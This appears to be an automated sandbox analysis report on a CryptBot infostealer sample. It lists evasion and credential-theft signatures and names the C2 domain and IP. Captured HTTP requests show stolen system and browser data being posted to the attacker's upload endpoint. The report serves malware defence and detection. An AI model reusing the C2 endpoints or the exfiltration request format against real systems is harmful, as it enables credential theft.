Windows Analysis Report
kFrGefsAK3.exe

Overview

General Information

Sample name: kFrGefsAK3.exe
renamed because original name is a hash value
Original sample name: c68297282df3b519f90b07be11d5b2c3.exe
Analysis ID: 1579767
MD5: c68297282df3b519f90b07be11d5b2c3
SHA1: b458d00cab0449a1c9f0f9225cc5c326199425f6
SHA256: b33d993baf0f52b1f0e01b6d6d4f568c37c21a641f41c8f6fb72c493f80a91a7
Tags: exeuser-abuse_ch
Infos:

Detection

Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: kFrGefsAK3.exe Avira: detected
Found malware configuration
Source: kFrGefsAK3.exe.7660.1.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["home.fivetk5sb.top"]}
Multi AV Scanner detection for submitted file
Source: kFrGefsAK3.exe Virustotal: Detection: 58% Perma Link
Source: kFrGefsAK3.exe ReversingLabs: Detection: 60%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: kFrGefsAK3.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A915B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 16_2_00A915B0
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_808a6827-5
Uses 32bit PE files
Source: kFrGefsAK3.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 16_2_00A981E0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 28MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49773 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49780 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.7:49812 -> 185.121.15.192:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: home.fivetk5sb.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1Host: home.fivetk5sb.topAccept: */*Content-Type: application/jsonContent-Length: 562201Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 33 36 34 31 30 39 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 2
Source: global traffic HTTP traffic detected: GET /niCGMfnfOxUBXxpLhBBB1734796753?argument=BxEuZQ8dqUtualOs1734940304 HTTP/1.1Host: home.fivetk5sb.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5sb.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------Bq85OC0aiBvZof6ZVQIXWfData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 42 71 38 35 4f 43 30 61 69 42 76 5a 6f 66 36 5a 56 51 49 58 57 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 59 61 74 69 73 6f 73 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 06 d1 89 31 65 26 24 f0 00 19 02 6e 79 f0 12 c0 cd 04 83 91 ab 9e 5b 76 cf 54 ef 03 ad fb 49 b2 55 a4 9d 91 bd d5 15 a9 7f 20 c7 e7 8e f5 08 76 77 a0 be 9e 7e 2d 4a ca ff f4 2c d5 69 83 d4 17 ad c2 c5 54 2a ad be 15 23 b9 c9 b7 66 8e 6b 7e a5 6a 77 bd be e2 7e f6 82 c3 d2 64 e9 01 1b 81 6d 2e e5 26 cd 09 6f a1 10 fe 12 af 3a a2 5a 74 76 d3 c7 36 f3 24 a7 6a aa 93 d4 d1 95 3d 61 99 dc e8 1e 4a 89 6f 92 8e 23 58 48 07 1a d0 b7 36 bc 41 73 fc 07 80 ca b8 9a 91 9e b7 59 f1 df 84 81 00 3c 7d 85 a4 b2 25 af 07 0f c3 53 84 0d b5 ff 1b b3 e3 03 e5 81 63 7c 2d 1a d8 de 49 b1 1a af 90 5d c6 73 2c 22 46 ab c4 74 96 a3 70 88 09 5d 88 62 b7 fd 1c b2 b7 8b b3 e4 c1 20 27 29 00 f8 3b 26 6e 1d 1d 14 2a f0 63 b5 82 11 62 a4 16 5b b4 d9 29 39 65 88 19 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 42 71 38 35 4f 43 30 61 69 42 76 5a 6f 66 36 5a 56 51 49 58 57 66 2d 2d 0d 0a Data Ascii: --------------------------Bq85OC0aiBvZof6ZVQIXWfContent-Disposition: form-data; name="file"; filename="Yatisosi.bin"Content-Type: application/octet-stream1e&$ny[vTIU vw~-J,iT*#fk~jw~dm.&o:Ztv6$j=aJo#XH6AsY<}%Sc|-I]s,"Ftp]b ');&n*cb[)9e--------------------------Bq85OC0aiBvZof6ZVQIXWf--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5sb.topAccept: */*Content-Length: 89686Content-Type: multipart/form-data; boundary=------------------------2ZYDDUMLBNJg6E3AfUkxmEData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 5a 59 44 44 55 4d 4c 42 4e 4a 67 36 45 33 41 66 55 6b 78 6d 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 61 6e 65 72 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 4b b2 26 f3 38 87 0a 52 50 7e 05 c4 85 23 66 15 7f a5 cb ef c0 86 82 1f 6d 6d 03 e0 20 ec e4 b3 33 ff 66 83 8a 33 b7 6c 7e 24 7f e6 ac c3 4f e6 78 06 7e 17 a9 74 b9 66 6d 6a a2 62 c7 4b f7 bf 56 72 be 58 41 b9 6f d0 12 9b e1 32 16 f1 3e 35 dc a1 27 b8 df 12 eb 45 75 20 a4 be 02 ef dc 8b ba 51 f3 1b b5 c0 34 78 c4 88 ff 94 69 c2 9a 1b 17 39 d0 bc 54 36 e9 68 21 94 53 ac bc 5e 44 11 c1 1a a9 1f a5 7f 54 5f fc 4c b9 ec a2 aa 04 bc 3d 46 7f 3e f8 59 e1 f8 1e 31 36 77 c2 26 aa 8c 22 1c db 26 c5 87 8e 2a ff 75 58 27 d6 c8 e1 f1 37 43 f9 ac 12 ce c3 da 7b 40 0a e0 63 39 6c 53 ee 7e 48 33 50 27 76 e0 4c 74 bb cd c6 83 61 71 d6 51 7a 3d 76 8b 71 b8 74 67 ab f8 fb 07 b3 36 97 1f b0 06 f4 42 7d c7 56 58 e9 f7 3e 84 24 b1 95 3c dd d3 7b 77 ab 89 c3 09 23 06 31 19 52 74 d2 22 03 dd 7b 34 32 f6 df 42 f3 04 1e a3 8a 0a 9c ad 19 b4 ae 5b 72 9f f4 41 78 85 ff 7d 10 1f 83 cc 2f 8b f9 e5 71 28 72 a5 9b 5f 0e 39 f6 e4 0f 0f de f7 a9 68 a4 21 b7 9b 90 ce 55 0e d7 a7 38 8f e6 4e a8 f4 8b 70 ce 94 d7 5d 5a 4a 16 5c 43 17 2b 11 cf 89 42 e5 9b 34 77 c3 b3 eb 96 e5 d3 c9 54 c8 86 51 8d 9e 16 a3 eb 9a 4e 3d f5 21 ae 3b 37 05 27 45 f6 c8 21 2e aa bc 1a ab 35 96 1c a4 16 73 4a a5 ed 83 d0 f4 fb f2 b2 1b ee b8 93 39 f3 0b 2b 7d e4 6e a1 3d ed 8f 25 f0 00 d6 ca 23 4a 05 53 9b f5 73 43 c6 ed ac 32 58 24 62 f8 75 46 79 48 8f c7 b6 c4 3c e2 4c ed 87 ef 8f 6b 18 ab 31 bd 9c 88 f6 af 4a ed 4f 5c 46 01 2d 5f db 81 4b 6f ef 3d 32 36 e6 9a 26 0f e2 8c 8d 88 68 29 ef 35 90 01 40 61 51 bc 5b 0e f8 b2 7b 14 9e 1c 53 f7 65 bb 3c 99 dc f2 75 aa e0 e9 db bb 5c 40 20 28 98 b1 f7 1a e7 f3 89 e8 4b a5 f9 18 27 cb 19 43 ae 09 fd f3 da f4 82 9f bd 4f a0 be 85 bf 2c 8e 08 94 5d 69 a2 0c 4c 18 9d 40 ad 53 a0 19 6b e6 2b 28 37 9e 8f 51 cf ed 5b de 76 57 c9 51 e0 3e 89 ad ba 19 de 63 e8 86 b4 84 d6 87 58 1e 96 7c 66 79 76 c6 fb 96 e4 79 c7 f3 7a d1 15 cc 3a fc 27 11 20 cf 43 87 89 dd df 88 56 21 e8 00 83 64 73 f3 5c 74 ff 91 ce a5 93 1a 62 34 5c 98 f4 5a 32 33 47 2c cf dc 4c 60 15 ec 50 fe e1 1a 34 70 c0 eb d9 14 31 8b e5 18 29 80 a6 ad fc 38 3c 0a 33 ca fc 04 41 5d d5 66 50 eb ab 33 5a 84 7f 7d 00 6e f4 c7 2f 9d fe 98 9e 73 42 e1 1f 0d d7 90 91 04 b6 34 ea 27 f9 67 db 97 52 a8 f6 24 3e 77 d3 c0 53 1a 6a 5f ec 03 6b c5 38 36 d9 a5 75 c4 1b 73 8e 84 44 1b 88 73 f3 82 8a 5f af f1 bd 22 5c cc 4c 7b 12 f7 e0 82 8d ed 0d 8e a7 cb ae 03 fb e3 1d 47
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5sb.topAccept: */*Content-Length: 32572Content-Type: multipart/form-data; boundary=------------------------48BHYv7EkQYojYvZJgp9yrData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 38 42 48 59 76 37 45 6b 51 59 6f 6a 59 76 5a 4a 67 70 39 79 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 6f 63 69 68 65 63 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 3e 83 d7 a4 f5 90 07 b7 d1 5a d7 c8 bc 2f 50 e1 58 8f ad 45 e5 aa 5e 40 11 15 da 91 0e 5a 4e e8 a5 7b 7e 38 6a e2 53 19 1d 2c 5e 54 8c 09 77 b8 f5 bb ca 20 0e 12 23 75 a5 98 af 18 1c 3b d2 23 6c cd 65 59 20 e0 15 ba dc c6 2e 6e b5 05 a4 d3 54 6e 81 7e ee 85 32 20 33 43 2e 18 78 85 8e c2 86 c7 7d 80 24 69 b2 4d d3 3a 5b 06 cb 54 39 f0 b5 c1 f7 7b da 39 16 b9 fc 9d 8c 08 78 58 0a e2 f3 a0 08 76 fa be 0b cf 59 11 e4 bb 63 aa ae db 51 2c 7e 6c e0 ff f2 d3 33 5d 1d d2 57 3a 41 21 36 9f 69 ab c4 c1 30 14 0b aa 2f 59 df 57 cf 17 59 be 06 0c 32 58 11 43 e6 05 3d b8 21 8d 53 d1 e5 d8 32 0a 3e 40 67 bd c9 a7 5e ab 30 e1 41 d6 4b 95 cf 6e bf 2a a3 46 df fb b9 80 bb bd 3b aa e8 36 39 cb 42 b9 e6 f2 14 12 bc 49 7e 68 a7 4e 91 a4 61 3a a2 7f 17 ae cf 82 eb fc 71 6a a8 5f 69 b0 ff 5b f2 97 c7 f7 67 92 fc 00 4f c6 c2 b2 58 02 59 a4 48 17 52 da 1c b6 ae 9e 75 76 25 4a c6 57 e4 9b 70 61 6f 68 4d 07 77 9e ef 9b 32 2e 56 a4 0b 13 6b 76 d0 e9 75 5c 18 15 6c c3 12 b9 1d a7 94 1f d9 d1 8c 5a 4d 74 97 56 ad 2b f6 82 9c 3d 37 50 1e 69 2f 3b 4c dc 0a 1a 86 27 e1 0a f5 64 6c 02 8b ef ac 12 f7 c5 68 49 2a ed b3 52 40 05 54 2c ad 42 5e 44 16 fa b6 2a cb 98 bc 4f 7d f8 f9 bd 78 5c c8 95 6c c6 16 ce d4 de fb 92 fe 29 d7 4c df 42 03 c0 5a f3 ec 91 5f 31 74 6c a1 2a 14 f9 fa b2 1f cd c9 59 dd 84 11 7b 52 5e ae a4 9c 8e 99 23 a2 c9 12 3e 3b e1 54 f3 fc 72 8f ea 6a 1c 12 53 96 61 48 99 85 85 32 0a 52 e3 36 6e 43 bd e3 5b 87 6d 14 38 cc 62 ac 2a 8b 92 c9 2b 54 cb dd c4 50 ba ae cf 8e 92 6c 5d af c3 5b 55 32 6b ee ea 95 bb 0f 54 e3 cb f7 4a 56 94 5e cf a5 ae 4b 5b 62 c3 ec 8f 19 48 ba 7f 3c 62 35 48 be f4 3a 84 ca cb ec b8 35 7f a8 17 98 32 c0 c9 7f e0 f9 f4 b2 89 ae af ae e8 f2 d5 ca 17 75 60 6f ec b7 11 9d 1d 80 d4 b3 78 0a 39 f1 10 5e 94 60 5e f8 1d a7 e5 68 7a ee f5 d6 fc 1b a1 7b f4 d1 0e 66 d7 3f 64 0d 88 13 d2 3f 64 58 f5 b6 d2 64 e9 0e 6f 02 b2 b2 ba 0e ca 79 25 00 4f 11 bf af 50 d2 bb 94 f3 46 df 83 f9 d4 f9 be 5c 34 92 2e d1 da b7 1a 66 2b d7 60 b8 c4 14 ad 77 7b c1 dc 5f 34 0f 1e f1 ba 93 b6 11 db 8c 08 1f d9 99 0c 82 1d e8 91 98 83 81 cc c8 99 d5 eb ca 47 1f 77 e7 ae 54 4e 75 c6 c2 12 af 10 af 05 cb 98 9a 65 95 f8 27 fd 63 b7 78 46 68 3a 17 04 2e 64 c7 33 f0 11 53 b4 d1 f0 58 a1 28 3a 7d ca b9 15 82 f7 04 0c 0b 71 6a 92 26 b5 89 de 85 27 58 ef 47 a7 b1 c3 36 48 2f 20 58 82 f3 fc 54 6d 5b 31 4a 7c 72 0f de c7
Source: global traffic HTTP traffic detected: POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1Host: home.fivetk5sb.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 42 78 45 75 5a 51 38 64 71 55 74 75 61 6c 4f 73 31 37 33 34 39 34 30 33 30 34 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "BxEuZQ8dqUtualOs1734940304", "data": "Done2" }
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View IP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /niCGMfnfOxUBXxpLhBBB1734796753?argument=BxEuZQ8dqUtualOs1734940304 HTTP/1.1Host: home.fivetk5sb.topAccept: */*
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000002.1764104940.00000A7402735000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000004.00000003.1747483962.00000A74031C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1747566500.00000A7403190000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1747428915.00000A7402570000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000004.00000003.1747483962.00000A74031C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1747566500.00000A7403190000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1747428915.00000A7402570000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const 